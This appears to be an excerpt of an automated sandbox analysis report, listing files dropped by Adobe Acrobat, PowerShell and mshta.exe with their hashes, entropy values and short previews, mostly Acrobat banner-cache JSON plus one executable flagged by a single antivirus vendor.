                                                                                                                  SHA-512:D47BB7729FDC4AF62D10D57E289E286B0A54847BCCD9B9A355F87FFF0DA8A2A5F0ACCD7C76DFFAC31C359176E5FEC3C6B5D5905227E49F4775D049F3BCD7B324
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"27f2b6e1-61c6-42f8-87bc-5d2d7b58b9ab","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735108229443,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):292
                                                                                                                  Entropy (8bit):5.287640889612643
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXFSD5i/z+0HR+FIbRI6XVW7+0YezoAvJfQ1rPeUkwRe9:YvXKXFwY/J0YpW7v8GY16Ukee9
                                                                                                                  MD5:A9BB974861B7BD1F076E1449ADBA32A1
                                                                                                                  SHA1:626525B510516096DBF19ADDFB15B53510C75A54
                                                                                                                  SHA-256:4D7A0C5C6035A62B155760E2A102390D45376A4CC7285A5869B672CE53A0714B
                                                                                                                  SHA-512:AC1306B8E44F3FFC573A11AB6899BD78E4870433A3E56D860D9A20164B2029E7DF132916DF7FBC56A331D947AF38DF06BC3CA0C7A8EF1730FE8A7CA23D2A57B4
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"27f2b6e1-61c6-42f8-87bc-5d2d7b58b9ab","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735108229443,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):289
                                                                                                                  Entropy (8bit):5.307064536519335
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXFSD5i/z+0HR+FIbRI6XVW7+0YezoAvJfFldPeUkwRe9:YvXKXFwY/J0YpW7v8Gz8Ukee9
                                                                                                                  MD5:7403E570FF81D7CD49C6DB4BEB248F32
                                                                                                                  SHA1:900D2EB9C4521EE10BECD1FDCF2E62DE3F920FB0
                                                                                                                  SHA-256:09F2BE1648948A9F5710D98F00A33B78BB8F7067006E10DF4BB72FC6A637E41B
                                                                                                                  SHA-512:BB34BDD359AE30C4AE3C850CD6D28341C6CDA8986200EBDBEA9C55D17F8B496124F818D1BCCB1E269348CDB9CA4594CE84683A56AE4F161DE6086F7018CD3293
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"27f2b6e1-61c6-42f8-87bc-5d2d7b58b9ab","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735108229443,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):295
                                                                                                                  Entropy (8bit):5.314563206585413
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXFSD5i/z+0HR+FIbRI6XVW7+0YezoAvJfzdPeUkwRe9:YvXKXFwY/J0YpW7v8Gb8Ukee9
                                                                                                                  MD5:F5D98942666BA910EE500F97E2F86F91
                                                                                                                  SHA1:70A85599E9B23B8D7A9CDFF3FF5C0FD0179E814C
                                                                                                                  SHA-256:784A44BF556857DEF28D9225C78C03313B423F9B772666D146E73487567E9A80
                                                                                                                  SHA-512:6CB93D453A7FE207BA8E8102C0B9FA965ECED109F6EAEA513E7F5F0EC638A9E2B2FB6F54A24B4E55A077209E8C01E2EA9233CA5FDFDA0F2418F7DC9A97FD0843
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"27f2b6e1-61c6-42f8-87bc-5d2d7b58b9ab","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735108229443,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):289
                                                                                                                  Entropy (8bit):5.294813468703568
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXFSD5i/z+0HR+FIbRI6XVW7+0YezoAvJfYdPeUkwRe9:YvXKXFwY/J0YpW7v8Gg8Ukee9
                                                                                                                  MD5:5BE3CA6E84C9E6D844A08A90D9DEEF02
                                                                                                                  SHA1:492396A289A210C7009191D12925D61069A5210B
                                                                                                                  SHA-256:4CA178DD655CA5B8A066D00B066476E9360FFA23476C7DADAED8A76CF4A64E60
                                                                                                                  SHA-512:10D98C766144BA96CDB41D0773EA99129D2376CFB97E8D11AD266A2EB6B183D75C46AB7F33C85F3E425807FFA3E62785617ACE3B9C925C8762F394E91291FB3F
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"27f2b6e1-61c6-42f8-87bc-5d2d7b58b9ab","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735108229443,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):284
                                                                                                                  Entropy (8bit):5.280772529355729
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXFSD5i/z+0HR+FIbRI6XVW7+0YezoAvJf+dPeUkwRe9:YvXKXFwY/J0YpW7v8G28Ukee9
                                                                                                                  MD5:1D01F8430EDE3B27D5B84D31BE99C4DD
                                                                                                                  SHA1:1447E629D82C0C7F987EE95605108402BC9F5810
                                                                                                                  SHA-256:F5853DB2EA007C6C2C5E8999DD5BF1261D1A52BB28A1ED9C7846091B96416E7E
                                                                                                                  SHA-512:DC4729F120C99A5F38FDA6896DDFAF5788E3758DF3C9CCB4CDE74A626C548A71D39507381CEAFFA1EC6F2FCB3FA236021613C812BB8A5C29A51DDC8572E301B9
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"27f2b6e1-61c6-42f8-87bc-5d2d7b58b9ab","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735108229443,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):291
                                                                                                                  Entropy (8bit):5.2783962126406365
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXFSD5i/z+0HR+FIbRI6XVW7+0YezoAvJfbPtdPeUkwRe9:YvXKXFwY/J0YpW7v8GDV8Ukee9
                                                                                                                  MD5:9CDCE4163FD336B84A0F15A703E530E3
                                                                                                                  SHA1:5AE8EA7F72C48D759CF63583B06F67E559E49077
                                                                                                                  SHA-256:DEAE6499E7BBD1D44A9102BA7FA911D303216A982FE211DAA62317F6DD67A36B
                                                                                                                  SHA-512:454741F83636990F9AE8A956BBB70B66372E35984B5A59CB8DF5DD72A92203988BE8FCD8D4EEA661627CBC40AA45664FFFFEBCFDE73C71C75A340BC212D45B77
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"27f2b6e1-61c6-42f8-87bc-5d2d7b58b9ab","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735108229443,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):287
                                                                                                                  Entropy (8bit):5.2796832619744585
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXFSD5i/z+0HR+FIbRI6XVW7+0YezoAvJf21rPeUkwRe9:YvXKXFwY/J0YpW7v8G+16Ukee9
                                                                                                                  MD5:9C4E4087DD5F2F1D2990E5E34C0D4E05
                                                                                                                  SHA1:774BDECE43646BCFE9D4530AD82C370428888C91
                                                                                                                  SHA-256:3D9113D99022A81F22162822C49967F1601D7D5180DDD18DEFA684CFBB2F8920
                                                                                                                  SHA-512:3CD44EE31BBD3BB2B87C4285C5856E8EC657759111F9CA77F2B218CE7F422CAFB1CCA1E84F309D9D2B6BC0CC622C07E3823DAF6238D1F6F933DB0FCA336DF4BC
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"27f2b6e1-61c6-42f8-87bc-5d2d7b58b9ab","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735108229443,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1090
                                                                                                                  Entropy (8bit):5.665477180140632
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:Yv6XjBliBamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSZ:Yv0BMNBgkDMUJUAh8cvMZ
                                                                                                                  MD5:AACFC1F9E59BB64F0BA1A059BF8CE64D
                                                                                                                  SHA1:AD2E5FD003067FE9A17E92A552A2600C82DCC578
                                                                                                                  SHA-256:8A3A096FBE9DF99956C3DCBCE1B51D0CF6B4C78CC6956F0B6CF9FD2DABB589F8
                                                                                                                  SHA-512:91F53871D8EB72CCEF36BB48D31781C4BEC42AC663E4CF56F4118650F6D1D2397D3883A39FAA345DCA1452B4B0FC7A0320501C9758F099B33E0CE5A339C68335
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"27f2b6e1-61c6-42f8-87bc-5d2d7b58b9ab","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735108229443,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):286
                                                                                                                  Entropy (8bit):5.254297700500945
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXFSD5i/z+0HR+FIbRI6XVW7+0YezoAvJfshHHrPeUkwRe9:YvXKXFwY/J0YpW7v8GUUUkee9
                                                                                                                  MD5:AE7632F3BF986BBD8D7CF75B24981B10
                                                                                                                  SHA1:01774A5FAB88C2B228A6A776830DAC9DF84E8801
                                                                                                                  SHA-256:B17C0D5E59C898A250E74186B9D43F222FD4F9B618E5A12CA6CD581510EBCFF7
                                                                                                                  SHA-512:9173A34E01976CA74F9CE16E6A5A44022BBC0A5A1C9FBA06E03D9D4806E68ED804B12061A01CA1DFB1B428F867E94C793F7E43BD20D7A996D6BA50AA6B2A025A
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"27f2b6e1-61c6-42f8-87bc-5d2d7b58b9ab","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735108229443,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):282
                                                                                                                  Entropy (8bit):5.26340554698471
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXFSD5i/z+0HR+FIbRI6XVW7+0YezoAvJTqgFCrPeUkwRe9:YvXKXFwY/J0YpW7v8GTq16Ukee9
                                                                                                                  MD5:4B5BD4513A8AB722737A0A4244E7EBEC
                                                                                                                  SHA1:B5711D2A54AFCF34F556CF0DC088B293BDA35BA9
                                                                                                                  SHA-256:7E54F0912EFA928CB40EF5AE590345ED3F7963B04049F33762B072F09B6EC5E3
                                                                                                                  SHA-512:954401843267EAA59F72A5BD88ACCA64F49C45A3A75DCCB45F770B65968AA36344F2D9E67AAF391EC3260F1BD507DD905A8B6B21A35071A40F630C2278BB1384
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"27f2b6e1-61c6-42f8-87bc-5d2d7b58b9ab","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735108229443,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4
                                                                                                                  Entropy (8bit):0.8112781244591328
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:e:e
                                                                                                                  MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                                                  SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                                                  SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                                                  SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                                                  Malicious:false
                                                                                                                  Preview:....
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2814
                                                                                                                  Entropy (8bit):5.13129075368379
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:YpvhpHk42getck8Fyi+AiLDSOQZh9CiLf:svhG42gEIFUSO8/CIf
                                                                                                                  MD5:3B5B09355D382FF56035217DC53B6CED
                                                                                                                  SHA1:3CDC3B43B6CEE5197704C17600436EE129A49CAE
                                                                                                                  SHA-256:291F740AD3381DEC21105AC4DAB8AAE3DF88FF97612C26DC468C6B007592CAB4
                                                                                                                  SHA-512:8CFD3085C23CFB9BBDEE695D352EC1A0A8CE42068EE9443C7F813646E51C288B7814D291EF039D7A790F2E6204CA80E10ABE7C2BE1E8366AC7A5870998B359AE
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"97f81776080734ea82d8f8243e72d0da","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734934318000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"eacfda5cc295eaa242a116cb5fe99923","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734934318000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"dc8e913d387b93e02e158ada7d674352","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734934318000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"fd01693080e8cd688dc70eb331956564","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734934318000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"2bb51335f2218d3c7bbf14049fefb110","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","size":289,"ts":1734934318000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"e214eaf9bce05d6fa0336b43abd6cc68","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":2
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):12288
                                                                                                                  Entropy (8bit):0.985752865747936
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:TLHRx/XYKQvGJF7urs6I1RZKHs/Ds/SpU4zJwtNBwtNbRZ6bRZ4BF:TVl2GL7ms6ggOVp/zutYtp6Pq
                                                                                                                  MD5:88D1D59445F1FF7B8B40B5E0D6559C90
                                                                                                                  SHA1:AA4ACC82893E016C3C3CB618AA0D84707F22AF23
                                                                                                                  SHA-256:1F4375690353D052DCA56C03038DC3E434DAC47C8AD69FB711467996E9B91F6B
                                                                                                                  SHA-512:2B4C75F66024D7FDA4109E680B393FBD755A435351CD2BD47F90EADDA507F44E218663A560138223A42CE74832CF7F11E82C76A0201C05618BF19196CFFF5950
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:SQLite Rollback Journal
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):8720
                                                                                                                  Entropy (8bit):1.3386281642526956
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:7+tjAD1RZKHs/Ds/SpUPzJwtNBwtNbRZ6bRZWf1RZKvqLBx/XYKQvGJF7urs+:7MjGgOVpIzutYtp6PMWqll2GL7ms+
                                                                                                                  MD5:D6E5FB127C31495182BECE4CED45EBF0
                                                                                                                  SHA1:AF05A1997A7668D04F91F26EF37C1F69088EE0F7
                                                                                                                  SHA-256:FB0D6684863A4FDEDE479E46F360D123104EEF3DC62D4E1A1B30B67B3D583371
                                                                                                                  SHA-512:90A0181F7E8ACBA99DB2245C169BF1052CE4B81891E265E03256A978E95A62ACD18AF5524667340D12907538B0D97EC258883598BBD761C4B78B4E7A1B5AD569
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):66726
                                                                                                                  Entropy (8bit):5.392739213842091
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:RNOpblrU6TBH44ADKZEgHpbD+QuT1epmS1VRhYmdq8LYyu:6a6TZ44ADEHpP+Q+1e/ZLK
                                                                                                                  MD5:21098123EA14B0F952FE8E58B21E9612
                                                                                                                  SHA1:95E0D75EF9F177FABDCCB1ED94794378D1B89722
                                                                                                                  SHA-256:2190E4EA706D00E0A4D48C21F83E8EF33FA1FDBCF3639FC8FBFF889AD4E4A359
                                                                                                                  SHA-512:8109E026A2C1BCFD6E3B591E71F18B2618211DE22EA4001FDD3F8243BE92AFC71D0B7FD1A47D83D49E2B30486517C6E54384E4CB9E38585442F2A4CD6A13EBDD
                                                                                                                  Malicious:false
                                                                                                                  Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                                                                  Process:C:\Windows\System32\mshta.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):441595
                                                                                                                  Entropy (8bit):6.383983943996756
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6144:IhaNDyEJXsEy62haNDyEJXsEy6fhaNDyEJXsEy6UhaNDyEJXsEy64haNDyEJXsEV:Hj186Nj186Oj186Lj186Xj186Z
                                                                                                                  MD5:BE648DD9082566580B3484A8D00AE8D9
                                                                                                                  SHA1:31B21C5D4C33AFE52A0998B7F61919150500F245
                                                                                                                  SHA-256:264659EA41F75D41D6739AB9863DBA1BC9CFB435300FB2928741CB1848678B20
                                                                                                                  SHA-512:451FC90CEE63F989802BE269BAEF26838B48596F4ABBBDEB547D83AD90A7528AFACC25DBF94A5C1B29FE4683C44DF9FC1594D44DB4B0EBC1240A5CD555F40467
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):11608
                                                                                                                  Entropy (8bit):4.890472898059848
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                                                                  MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                                                                  SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                                                                  SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                                                                  SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                                                                  Malicious:false
                                                                                                                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):64
                                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):246
                                                                                                                  Entropy (8bit):3.505069684106714
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8rOlAiaw:Qw946cPbiOxDlbYnuRKDl4w
                                                                                                                  MD5:4BBF3C412BE57CC6DA275885E31C0B83
                                                                                                                  SHA1:B7D9A51775B6A660BA6F9E45D98C8BA6B2F3C3DB
                                                                                                                  SHA-256:119550F308C9987B903AAC9646B58B67D6A50CAC5ABE799F91C92415EE622D8F
                                                                                                                  SHA-512:7CA79A51F0EAB9A8D7FC515552A048D75121B644BEE7EA7846B33019C23C532B1A5285B0091B487A1046FC1DAD5A5AB8900DA50B104C46380FB4854247F8E743
                                                                                                                  Malicious:false
                                                                                                                  Preview:Error 2711.The specified Feature name ('ARM') not found in Feature table. === Logging stopped: 23/12/2024  01:11:55 ===
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:ASCII text, with very long lines (393)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):16525
                                                                                                                  Entropy (8bit):5.376360055978702
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:6b1sdmfenwop+WP21h2RPjRNg7JjO2on6oU6CyuJw1oaNIIu9EMuJuF6MKK9g9JQ:vIn
                                                                                                                  MD5:1336667A75083BF81E2632FABAA88B67
                                                                                                                  SHA1:46E40800B27D95DAED0DBB830E0D0BA85C031D40
                                                                                                                  SHA-256:F81B7C83E0B979F04D3763B4F88CD05BC8FBB2F441EBFAB75826793B869F75D1
                                                                                                                  SHA-512:D039D8650CF7B149799D42C7415CBF94D4A0A4BF389B615EF7D1B427BC51727D3441AA37D8C178E7E7E89D69C95666EB14C31B56CDFBD3937E4581A31A69081A
                                                                                                                  Malicious:false
